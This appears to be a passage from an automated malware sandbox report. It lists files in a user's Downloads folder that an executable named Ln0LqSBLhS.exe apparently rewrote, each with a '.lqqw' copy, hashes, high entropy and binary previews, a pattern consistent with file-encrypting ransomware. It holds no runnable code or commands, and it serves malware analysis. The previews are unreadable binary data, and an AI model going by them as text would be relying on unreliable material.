                                                                                                                                                                                                    SHA-512:3BB7D5DA0274A83E81956D38BFB61AC6A33F587D2F2446FCB3333BF13F072B60B58DD1C28CE34FD3E5DBE397177E2413A8214439F6F52C1E9231F6399008AC94
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..`{....'Q?.N.`ew*..3y(u...5A..../.#..+.^.M...p_.-U2UA..@....{.#D..<./.l..........v<.......b;kyA..M.-DY..kOt...+......hmK.b....{.F..Z.".c....w..Ld..o.%...Z......d..y4.8..*....`..<.N.......q..)F...sj..,e<.q .r.t..l.L.>.....M...y....t............xx.....@...KC.......6P...;.........+8c.K.._1.*q.0K."...(...1=f.^..q{..9.C..........)Y.]...Qb._...#)}."..!.}F.....`z.P.,'y+Q.......3>.".~.m..lS.u.......}p....|.1.........fC|.j.m...........d....x..;...}.^.3.B.#.)..P5E..m`.F.......-.....K%..J_...Sk.m.N..<.....T21...;...BF............+.M0...'?5........*@.~.?.....1..v..\....-`74.#0.T~EO..@..QlS....E2....]....Uq......h.]..c.."..V....%419.".^5...-.Lx.IS.@F%..W.S..,......3WcL.R,E..Wnx.b...G..^..I...~2]!.'..5../...y..;..=..........o.7...C}5.Vm..7u.=....&q.J..2:.3z!.0.g.v..._5....$# 7(.W.Q....++.U..8..M.W.!7.vF..<..N...Fv..q.{u,...6:...~.S..8. .%F.s........i..Y.n.[...$...\~mV.......9Tu...II.i1V...m.S.z......+^....l..3.........L.j...4............TW.ge>.f
                                                                                                                                                                                                    C:\Users\user\Downloads\EWZCVGNOWT.xlsx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8347368380931
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:/wsNKHeZjaVbnYbYdAFaw6w6QfZbuR1OCNTBk42zw1OAG1TzXL7CoEbuj4bD:9KHNnYbQAFL6wt9o1bNTq4z6TzimiD
                                                                                                                                                                                                    MD5:244B2AADC79EA9213B47B9C4FAA0EAAB
                                                                                                                                                                                                    SHA1:F56233029365B3C76B53EFCEA376916EE851030B
                                                                                                                                                                                                    SHA-256:E1237DCF2606B9E95C86EB175F3768551307CF2AA88FBCA201E5D801DD01E65A
                                                                                                                                                                                                    SHA-512:7EAE29042541E9DBCC1C9E23C7BD62039F47C6128C29710E647F559B389F906EA67A879D7771F71EDE468D64961181968680C1A2B1A211F9D817D0EC88ED5E58
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...UY.X....ZL.[...'.YKn..^HH...z...>.....4.sPP,L.E..u..P3.:p..@,..va).#n....z...V.....0...=L...iA.MF.....N.O>...nS....Y..Tl.k/2[.<..<..,q..../F.4[+...d.8+..a..9.4......zba/.....q....@L..9..<|'.....Y.o.1Y..8p.$.vS......Bd..$Y..y.H.NEa,.......j*x.3....B.....0B..=.r.Cm.(:..;..KL..-}Q\.j.XF|.V..w..|...k...k.....z..5.j...>..q.?.Z....j<..s..w.....K...l.OV.../...ASH".......P..K....hA......g..*\..../D..`.Ipd..D.r.........g....'fS. vU.Fj.*..o!;....+a&..$7.F..n..G..k...y..U........U..z&.m.?.../3......T.."...er..+.BH..c.2/....K.U)$@..Z.Ky...W..)......BmPI.U>...b..2?eL#...........[+&g..3+.....j......B...U.^.U...?..A@G9.B..H6.9.R.X.e.+...g@].T.h>tXIK.L.$.Q..n...3............(..p...U^....)....T.~..C8.......VKH.X..J..uL6.e.Y...kc...q.*J^....'.>xZ..,.K0....e...x....+.s...|.s.....x.TGL.....wV......*T)1..q...]...I..2X.....'..|.t..$^w136.ZOZ.&...:..d..L....~..k.\}.................y...(w,w..x.K9..x=I.................Vl.6......Rv...}H....jT...U}S.jO..m.....CB.].
                                                                                                                                                                                                    C:\Users\user\Downloads\EWZCVGNOWT.xlsx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8347368380931
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:/wsNKHeZjaVbnYbYdAFaw6w6QfZbuR1OCNTBk42zw1OAG1TzXL7CoEbuj4bD:9KHNnYbQAFL6wt9o1bNTq4z6TzimiD
                                                                                                                                                                                                    MD5:244B2AADC79EA9213B47B9C4FAA0EAAB
                                                                                                                                                                                                    SHA1:F56233029365B3C76B53EFCEA376916EE851030B
                                                                                                                                                                                                    SHA-256:E1237DCF2606B9E95C86EB175F3768551307CF2AA88FBCA201E5D801DD01E65A
                                                                                                                                                                                                    SHA-512:7EAE29042541E9DBCC1C9E23C7BD62039F47C6128C29710E647F559B389F906EA67A879D7771F71EDE468D64961181968680C1A2B1A211F9D817D0EC88ED5E58
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...UY.X....ZL.[...'.YKn..^HH...z...>.....4.sPP,L.E..u..P3.:p..@,..va).#n....z...V.....0...=L...iA.MF.....N.O>...nS....Y..Tl.k/2[.<..<..,q..../F.4[+...d.8+..a..9.4......zba/.....q....@L..9..<|'.....Y.o.1Y..8p.$.vS......Bd..$Y..y.H.NEa,.......j*x.3....B.....0B..=.r.Cm.(:..;..KL..-}Q\.j.XF|.V..w..|...k...k.....z..5.j...>..q.?.Z....j<..s..w.....K...l.OV.../...ASH".......P..K....hA......g..*\..../D..`.Ipd..D.r.........g....'fS. vU.Fj.*..o!;....+a&..$7.F..n..G..k...y..U........U..z&.m.?.../3......T.."...er..+.BH..c.2/....K.U)$@..Z.Ky...W..)......BmPI.U>...b..2?eL#...........[+&g..3+.....j......B...U.^.U...?..A@G9.B..H6.9.R.X.e.+...g@].T.h>tXIK.L.$.Q..n...3............(..p...U^....)....T.~..C8.......VKH.X..J..uL6.e.Y...kc...q.*J^....'.>xZ..,.K0....e...x....+.s...|.s.....x.TGL.....wV......*T)1..q...]...I..2X.....'..|.t..$^w136.ZOZ.&...:..d..L....~..k.\}.................y...(w,w..x.K9..x=I.................Vl.6......Rv...}H....jT...U}S.jO..m.....CB.].
                                                                                                                                                                                                    C:\Users\user\Downloads\GIGIYTFFYT.jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.819103804236145
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:IRRyxzBY0iBzUTaQe9PN39v7hRgsCBq0/FjfAu040DnWtUbD:8Ryx1Y/qaQu3v7s/T0u04KI+D
                                                                                                                                                                                                    MD5:5190F34504C619B5AFF45D0F624FB9FD
                                                                                                                                                                                                    SHA1:9C01B189918C80252C398764A5EAE40ACF6936A3
                                                                                                                                                                                                    SHA-256:8A181B7D0115EFD11956BDDD43C8A0F8898987682A3F033417C3BAF727DBEB16
                                                                                                                                                                                                    SHA-512:88D0500E70372E2D8E8DC24B5D39AEC6D2495E5E99D7538AE61E47FC30E5E911228E49337ADBB9996776D8F7F37DA41705277D099290E3B266FD1886D2C2588F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .+. ...g.......go........!..2.....g...*.4.k..5j.S..4..x......2.S..RN.=..........6} ~....D.A.......,/bq....WJ..DW;......akH].M'5.w..!cvV..&B4.^.4K..fq..G..D=t......M..b$..e..n...:1-....i*M.....R.&.T.=........i.....S._N.U!..n.+...o...]h.....G.cd.3...i....Emz-g.....].....;.r./L.]..fU1...pX'........M..].y.cyzN.tWlm"\LL./...L..O|....&...S{.S].f('..zh55.,..`,..n[..x=0.?.{...s..XW..]....L.U..K.<2|....0.........`)a.N..,........>.f....L6@.5.d:[t....JW{..WWf.^@..L.....T..3OO.p8K..bt~.........,....~V9..M...l<b.p.....s.........*.)..2.....m.'.....L.....{.E...........r.....q.....!..........M.K$r-.0..-Vx...9.W.Zt-1W7....ga....C.e.LZZ.K.Y1....kx&p...#.l^./......B]#K.pD..2..+.(<.!.EN.C._..P.hT...|S=.vt....R.._u.5h@DC4m.<......:gh..Q..!H$).._....1...8j...\./.M}.L....vMp.a.]..o....;.....I..>51I5pj...M....`...Hr.7..Q.b!.....Oa........<.l..6.sq.....Dr.).7..........x>...)..jD.KF.-.sp.......Tb7....(,..&.....hK...5:..C..9...C.x.;h.K..o..bN....4..YcW.
                                                                                                                                                                                                    C:\Users\user\Downloads\GIGIYTFFYT.jpg.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.819103804236145
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:IRRyxzBY0iBzUTaQe9PN39v7hRgsCBq0/FjfAu040DnWtUbD:8Ryx1Y/qaQu3v7s/T0u04KI+D
                                                                                                                                                                                                    MD5:5190F34504C619B5AFF45D0F624FB9FD
                                                                                                                                                                                                    SHA1:9C01B189918C80252C398764A5EAE40ACF6936A3
                                                                                                                                                                                                    SHA-256:8A181B7D0115EFD11956BDDD43C8A0F8898987682A3F033417C3BAF727DBEB16
                                                                                                                                                                                                    SHA-512:88D0500E70372E2D8E8DC24B5D39AEC6D2495E5E99D7538AE61E47FC30E5E911228E49337ADBB9996776D8F7F37DA41705277D099290E3B266FD1886D2C2588F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .+. ...g.......go........!..2.....g...*.4.k..5j.S..4..x......2.S..RN.=..........6} ~....D.A.......,/bq....WJ..DW;......akH].M'5.w..!cvV..&B4.^.4K..fq..G..D=t......M..b$..e..n...:1-....i*M.....R.&.T.=........i.....S._N.U!..n.+...o...]h.....G.cd.3...i....Emz-g.....].....;.r./L.]..fU1...pX'........M..].y.cyzN.tWlm"\LL./...L..O|....&...S{.S].f('..zh55.,..`,..n[..x=0.?.{...s..XW..]....L.U..K.<2|....0.........`)a.N..,........>.f....L6@.5.d:[t....JW{..WWf.^@..L.....T..3OO.p8K..bt~.........,....~V9..M...l<b.p.....s.........*.)..2.....m.'.....L.....{.E...........r.....q.....!..........M.K$r-.0..-Vx...9.W.Zt-1W7....ga....C.e.LZZ.K.Y1....kx&p...#.l^./......B]#K.pD..2..+.(<.!.EN.C._..P.hT...|S=.vt....R.._u.5h@DC4m.<......:gh..Q..!H$).._....1...8j...\./.M}.L....vMp.a.]..o....;.....I..>51I5pj...M....`...Hr.7..Q.b!.....Oa........<.l..6.sq.....Dr.).7..........x>...)..jD.KF.-.sp.......Tb7....(,..&.....hK...5:..C..9...C.x.;h.K..o..bN....4..YcW.
                                                                                                                                                                                                    C:\Users\user\Downloads\LFOPODGVOH.mp3
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.866847305268254
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:g0gXBd3ZjR/LVK4YRt9tNhqnJqqhmBA5ldW6ef0ghPNrNDeWQolTLtKGiqbD:aTVyrRUJz5HW6GhPNr5eyTweD
                                                                                                                                                                                                    MD5:5F7CA270AE0393D8DB32A422366BBA49
                                                                                                                                                                                                    SHA1:EB9682A1E9B9BF1B73931CC3B844A8C5BD30CF54
                                                                                                                                                                                                    SHA-256:8D95FE20647489AF75441017E13A97310BBEFAE83CEF889C79680541F33D1F5D
                                                                                                                                                                                                    SHA-512:462F2C95C2ED74A511657736CB29D39D3875B2AF1D1CD9FBF6C82530A29B377359889022823DA2F5709D79DF5B8BFCDF031D244AD325A15BFCB9DB261B96DC15
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: )..%..._./...v..gc&.D.b|....eB.=K.;.%.D. <.......1*..r...U...2.zL...Y9..r.'...U....e...k...b......?..N..C....}.......R#H^.3..,./.dGF..~.#.kmpH+c..L..G_...s%%n>(.C..9.......Jl....bw....=a>.KV9b+S.5........'.\.......b.hn..S..6.......uz.bEN.......l.w^.G....M.bx.......=.....Q)).x......9h..dB.*".n5...<...?.D.9..{.K.}S.e..c...Q.+...a.2.....B).....*..}r..\.o.S....v.......*..|.:.s..sM.y4.=...!M.u.B.A......z0...\.J2....&n;&K..e.W......P.a.6*=Y....[..."s.?=..inm............8.;.a.....W..tJ..*.u......l..,n+.\!....0.k"|.%...+...%*B.s+..{.p5O.$.AQ.[7.k....5...._.'.ML......!t....9...Trz..'.@.I.!YN..}^..U.0.A..4^.......[.<~..r6.I.....A}8..[e+J...Z..5.._..).y}...a..i...@.)^6.u...8.H...zu...A/.V.......H...T^.c.......>.b.x@....Q...SU'....)/T.J.G.\/....@...=o....<Y.......J.....P.\..Mz.6...:..Y!.y...Mm3.+.H..p.t....X,....sD.......~......O....W`........o.j..^...Bp.&.J<....W5.i<.....|X..te[.v.p.r:..\.0.{.y:..[YGt.?.AI..u..%n.d.....O......T..>}j4.I.!...,
                                                                                                                                                                                                    C:\Users\user\Downloads\LFOPODGVOH.mp3.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.866847305268254
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:g0gXBd3ZjR/LVK4YRt9tNhqnJqqhmBA5ldW6ef0ghPNrNDeWQolTLtKGiqbD:aTVyrRUJz5HW6GhPNr5eyTweD
                                                                                                                                                                                                    MD5:5F7CA270AE0393D8DB32A422366BBA49
                                                                                                                                                                                                    SHA1:EB9682A1E9B9BF1B73931CC3B844A8C5BD30CF54
                                                                                                                                                                                                    SHA-256:8D95FE20647489AF75441017E13A97310BBEFAE83CEF889C79680541F33D1F5D
                                                                                                                                                                                                    SHA-512:462F2C95C2ED74A511657736CB29D39D3875B2AF1D1CD9FBF6C82530A29B377359889022823DA2F5709D79DF5B8BFCDF031D244AD325A15BFCB9DB261B96DC15
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: )..%..._./...v..gc&.D.b|....eB.=K.;.%.D. <.......1*..r...U...2.zL...Y9..r.'...U....e...k...b......?..N..C....}.......R#H^.3..,./.dGF..~.#.kmpH+c..L..G_...s%%n>(.C..9.......Jl....bw....=a>.KV9b+S.5........'.\.......b.hn..S..6.......uz.bEN.......l.w^.G....M.bx.......=.....Q)).x......9h..dB.*".n5...<...?.D.9..{.K.}S.e..c...Q.+...a.2.....B).....*..}r..\.o.S....v.......*..|.:.s..sM.y4.=...!M.u.B.A......z0...\.J2....&n;&K..e.W......P.a.6*=Y....[..."s.?=..inm............8.;.a.....W..tJ..*.u......l..,n+.\!....0.k"|.%...+...%*B.s+..{.p5O.$.AQ.[7.k....5...._.'.ML......!t....9...Trz..'.@.I.!YN..}^..U.0.A..4^.......[.<~..r6.I.....A}8..[e+J...Z..5.._..).y}...a..i...@.)^6.u...8.H...zu...A/.V.......H...T^.c.......>.b.x@....Q...SU'....)/T.J.G.\/....@...=o....<Y.......J.....P.\..Mz.6...:..Y!.y...Mm3.+.H..p.t....X,....sD.......~......O....W`........o.j..^...Bp.&.J<....W5.i<.....|X..te[.v.p.r:..\.0.{.y:..[YGt.?.AI..u..%n.d.....O......T..>}j4.I.!...,
                                                                                                                                                                                                    C:\Users\user\Downloads\NYMMPCEIMA.jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8537410704372705
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:46cxwXqkisBLLKG+PQfvzvoMI7qPSfgH1tRtqaGx36JFBDuHbD:46cyXTjCervk5+jyB6JrDu7D
                                                                                                                                                                                                    MD5:29A3861CCE41D83D4CF05A9D2BE94BE4
                                                                                                                                                                                                    SHA1:8670487352A8DA38350F385B52FB54039F63072E
                                                                                                                                                                                                    SHA-256:D7F0BCF290D23121214F277B01F270E34BFD847F645E8DA0ABFA4B237945505D
                                                                                                                                                                                                    SHA-512:4B4714D996E85B8358011CD89859A32093C07D8DA8346C978D632C4D363122D9F8C430C4C69F9B9A0286DC9ABEA8989A7230C2BE5AE2442F288F00074609B2BD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Q6N.w]K....'>..1.Z.~..7....C...G...-.h......C.Wyel?.R..$....{.M.c......,.........XY..g.P+`.F3.g.esc..@\..B.S,..N...C.....6.V.6.J..._ad.[%zv...8O.)...#..a4..$T..5.<..*.%p..l.S.C]a..R..$.hK.h.se.....*pp...p....$.uF?!;.....'.....AyX...mA.j.i.!.,A?j.ARK....fU.....5.P...:p.rz..2..V+_.q......^O[d..c.o$SF.x.;._L....+..)..l.pLF..n......&..........T.9.GF.m..A.$...."".t...(...X.....a .t4..m..l...y..d.L........]3_.a...[.X3.t.\.A.D.P.=.....*b\.D...i..d@.._V.....D...Ly=J..}..-d..P{.?..X...7..3.. ...a.j.uR....!9....,.u.......Fu...'.~t..z...:.q.?...~..#..e.../P7..q..........D...J?.......*.T..m.5`Zj...M.....-.?....>...d..8dKYQ..X.......8.V.;...U1..}.`s.......@.X...Z)..%.~.w..;...V.)2...1./}.^u.n.#.Y;.3R....yg.F..C..r....M+..l..w...j...`...:..!.1.uXx~..t...d,...U.:d...`.'?....,c5..a*.(.z.F9._X....Y ..B..($.&.QxW......=..y.A....,x...z.[....2.p.....,....,..N..hw.g..#A...6F...Ug.S"...s..&.H.92...'+.d.|j.|..vY..GF.Q....c...>........-..<..zk..b.....M.::.14
                                                                                                                                                                                                    C:\Users\user\Downloads\NYMMPCEIMA.jpg.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8537410704372705
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:46cxwXqkisBLLKG+PQfvzvoMI7qPSfgH1tRtqaGx36JFBDuHbD:46cyXTjCervk5+jyB6JrDu7D
                                                                                                                                                                                                    MD5:29A3861CCE41D83D4CF05A9D2BE94BE4
                                                                                                                                                                                                    SHA1:8670487352A8DA38350F385B52FB54039F63072E
                                                                                                                                                                                                    SHA-256:D7F0BCF290D23121214F277B01F270E34BFD847F645E8DA0ABFA4B237945505D
                                                                                                                                                                                                    SHA-512:4B4714D996E85B8358011CD89859A32093C07D8DA8346C978D632C4D363122D9F8C430C4C69F9B9A0286DC9ABEA8989A7230C2BE5AE2442F288F00074609B2BD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Q6N.w]K....'>..1.Z.~..7....C...G...-.h......C.Wyel?.R..$....{.M.c......,.........XY..g.P+`.F3.g.esc..@\..B.S,..N...C.....6.V.6.J..._ad.[%zv...8O.)...#..a4..$T..5.<..*.%p..l.S.C]a..R..$.hK.h.se.....*pp...p....$.uF?!;.....'.....AyX...mA.j.i.!.,A?j.ARK....fU.....5.P...:p.rz..2..V+_.q......^O[d..c.o$SF.x.;._L....+..)..l.pLF..n......&..........T.9.GF.m..A.$...."".t...(...X.....a .t4..m..l...y..d.L........]3_.a...[.X3.t.\.A.D.P.=.....*b\.D...i..d@.._V.....D...Ly=J..}..-d..P{.?..X...7..3.. ...a.j.uR....!9....,.u.......Fu...'.~t..z...:.q.?...~..#..e.../P7..q..........D...J?.......*.T..m.5`Zj...M.....-.?....>...d..8dKYQ..X.......8.V.;...U1..}.`s.......@.X...Z)..%.~.w..;...V.)2...1./}.^u.n.#.Y;.3R....yg.F..C..r....M+..l..w...j...`...:..!.1.uXx~..t...d,...U.:d...`.'?....,c5..a*.(.z.F9._X....Y ..B..($.&.QxW......=..y.A....,x...z.[....2.p.....,....,..N..hw.g..#A...6F...Ug.S"...s..&.H.92...'+.d.|j.|..vY..GF.Q....c...>........-..<..zk..b.....M.::.14
                                                                                                                                                                                                    C:\Users\user\Downloads\PALRGUCVEH.docx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.853277751017612
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:0/cFkDtGXtr3hF96R3OCKtt3HfB0tRsuZsUmx+L/guFkOX7sEIqfDX4s/9oyPFO7:0PZUt9F96R+CKtJ504uVmML5COXDjfjs
                                                                                                                                                                                                    MD5:EEAF3AC26BCEFEAEDB9374247E532604
                                                                                                                                                                                                    SHA1:B29611387CE5CBEE90F5660084C9F521E27DA6CE
                                                                                                                                                                                                    SHA-256:9EB53C3A086498A682518CE7619AD8C0C4B1848A94DFFB9D072A5DE18895980A
                                                                                                                                                                                                    SHA-512:AA8E0922AB54E6EE4F992D36373C62D7BD472C24440AAB3BFD717CA76E0703C658B002995F3DC1CCFD0797C0F8E48359D316047FD1C2D2B8758E089181D664C2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..o.....9.y.e}.....~1.N.&.G.>@w.,m...Q..&...g'...n/......B..e....M.rT(h..,aY..]c.g.?..B.-80..c..7..Q+U.1...u....K.Xr}f..\...M.nU`_..C....I.....T..........W....BQ.R..).j...0.......y>....;@....@............;.G.1G...._.@)*`~~.R.....k.)...\......H.3..".s..$..!.q.S....f0...M-_.R8$3...F....(..;B.v...v7....V#..:|........DW.\E!.....<.....M.&5.....q.&.~.EJ.....]....8..}...%.....O[q........vt..4'M....@....'.4.8F}..x..2@M.7*....../...<n.5`.{]}.)V.y.:.E..3..-.L.?.....{..Y..A..~PE9..L....w..'%..R....\q^.....$.y..C./I......Az".B=...:0?s..a.rT.Q..8...djy..p.z^.q.......6.{..-z.."e...-8p(.j..H......D..t..Fp}._F.l%......|p..#.{.z...et52...|.;_.,w.`.n...Y./.......DK.P..B....Y1.........MkL......+..!.............J=*..u.I......}h(......3..0+7/~..K^w.0.cC......W..........c(....Y.......PL$LF....|..,._..j.......%V.46...}.hU_.Ztp.?.n.]..........f....T.t......+j.c..*R..g._T....2.^....7...r...b."..]"Q....IqXq..i.3}....z...RG[S\YP...x..q......$_..&....B.
                                                                                                                                                                                                    C:\Users\user\Downloads\PALRGUCVEH.docx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.853277751017612
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:0/cFkDtGXtr3hF96R3OCKtt3HfB0tRsuZsUmx+L/guFkOX7sEIqfDX4s/9oyPFO7:0PZUt9F96R+CKtJ504uVmML5COXDjfjs
                                                                                                                                                                                                    MD5:EEAF3AC26BCEFEAEDB9374247E532604
                                                                                                                                                                                                    SHA1:B29611387CE5CBEE90F5660084C9F521E27DA6CE
                                                                                                                                                                                                    SHA-256:9EB53C3A086498A682518CE7619AD8C0C4B1848A94DFFB9D072A5DE18895980A
                                                                                                                                                                                                    SHA-512:AA8E0922AB54E6EE4F992D36373C62D7BD472C24440AAB3BFD717CA76E0703C658B002995F3DC1CCFD0797C0F8E48359D316047FD1C2D2B8758E089181D664C2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..o.....9.y.e}.....~1.N.&.G.>@w.,m...Q..&...g'...n/......B..e....M.rT(h..,aY..]c.g.?..B.-80..c..7..Q+U.1...u....K.Xr}f..\...M.nU`_..C....I.....T..........W....BQ.R..).j...0.......y>....;@....@............;.G.1G...._.@)*`~~.R.....k.)...\......H.3..".s..$..!.q.S....f0...M-_.R8$3...F....(..;B.v...v7....V#..:|........DW.\E!.....<.....M.&5.....q.&.~.EJ.....]....8..}...%.....O[q........vt..4'M....@....'.4.8F}..x..2@M.7*....../...<n.5`.{]}.)V.y.:.E..3..-.L.?.....{..Y..A..~PE9..L....w..'%..R....\q^.....$.y..C./I......Az".B=...:0?s..a.rT.Q..8...djy..p.z^.q.......6.{..-z.."e...-8p(.j..H......D..t..Fp}._F.l%......|p..#.{.z...et52...|.;_.,w.`.n...Y./.......DK.P..B....Y1.........MkL......+..!.............J=*..u.I......}h(......3..0+7/~..K^w.0.cC......W..........c(....Y.......PL$LF....|..,._..j.......%V.46...}.hU_.Ztp.?.n.]..........f....T.t......+j.c..*R..g._T....2.^....7...r...b."..]"Q....IqXq..i.3}....z...RG[S\YP...x..q......$_..&....B.
                                                                                                                                                                                                    C:\Users\user\Downloads\PALRGUCVEH.xlsx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.848928072340476
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:VY/otE4P9fstF81OYL+9Owe7Mz3yhb+dfuuhKWDa0mbyRugToHdNK4lnibD:VY/oG4FoO1OYK9OwgMkCdPh5fm2BToTs
                                                                                                                                                                                                    MD5:B9EA82B00393DC75709D3774659E31D5
                                                                                                                                                                                                    SHA1:86C7B870D3FE4325185C7BD9E33D21E7EBBD07A4
                                                                                                                                                                                                    SHA-256:F7CA0473A1D8959C6D3752FDE37A46FF86667BB878257DEA98D7C7F59FB945EB
                                                                                                                                                                                                    SHA-512:ABA1DAAFC9FC0FEFF4018C754CFB78E927BEB4B97E3F836F6A9E5B80D129E82764B20B51377B6631792B64EFF1EBC7672938DAC4FBF4C2837AB038026DD52825
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...y..$\.......e..-.b.}..:~...V>.n....O....4H...6h..K....!...../......jHo."......;.L..!Vmt.O.u......C...UE...&6......v..T|..w.*.b...._...kT.MRr...3T.V.._%..X.$8...}.....x...4Fv. ..9.s......^O.M#+..m...L.C...V.....yptY....+.$..F.....];:&!x........U_..pQ.:..<.8.5..$[...Q....-..[./..Y..5...`.......(....%A... )..."......S..c..*.s.5.x..WE........Vm.w..%@..2.v.....B.\.>.......-.>....D;..$.r.I.m.......9.X}..p._Wi.k&..4..,.l*5.b"5B.....W.Y..yD. ..a&.^.5.j.PP..u..-..l9..L..A....Q...I...{....rW...H..]r]._.......O......&r...-... ..Jjx<."5.T.m.M..d.....mm:.`.xW.9%.M2...-...71.'..1..B...}..+1..w.V...........&/!..B...~..m.,...............H...%.Nn....4........b..(..t..4.......BN.W.Ch..2.9JW.\..X.b.\.S.\......w.J..n.LI....f..r.a... zT.E0.~..+..+...r..........r...<dvm..-2....+,....S..g,q..e....@a.F={.,~..pt.....'%.Y6.N&..g[..k.k..`T].h{.:......2.._._n........5.Ls...k..6.x.c.^...\@.DW2j )...c.#k.........v............p..... ...0vd..Zb.O..P..7C..b.......
                                                                                                                                                                                                    C:\Users\user\Downloads\PALRGUCVEH.xlsx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.848928072340476
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:VY/otE4P9fstF81OYL+9Owe7Mz3yhb+dfuuhKWDa0mbyRugToHdNK4lnibD:VY/oG4FoO1OYK9OwgMkCdPh5fm2BToTs
                                                                                                                                                                                                    MD5:B9EA82B00393DC75709D3774659E31D5
                                                                                                                                                                                                    SHA1:86C7B870D3FE4325185C7BD9E33D21E7EBBD07A4
                                                                                                                                                                                                    SHA-256:F7CA0473A1D8959C6D3752FDE37A46FF86667BB878257DEA98D7C7F59FB945EB
                                                                                                                                                                                                    SHA-512:ABA1DAAFC9FC0FEFF4018C754CFB78E927BEB4B97E3F836F6A9E5B80D129E82764B20B51377B6631792B64EFF1EBC7672938DAC4FBF4C2837AB038026DD52825
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
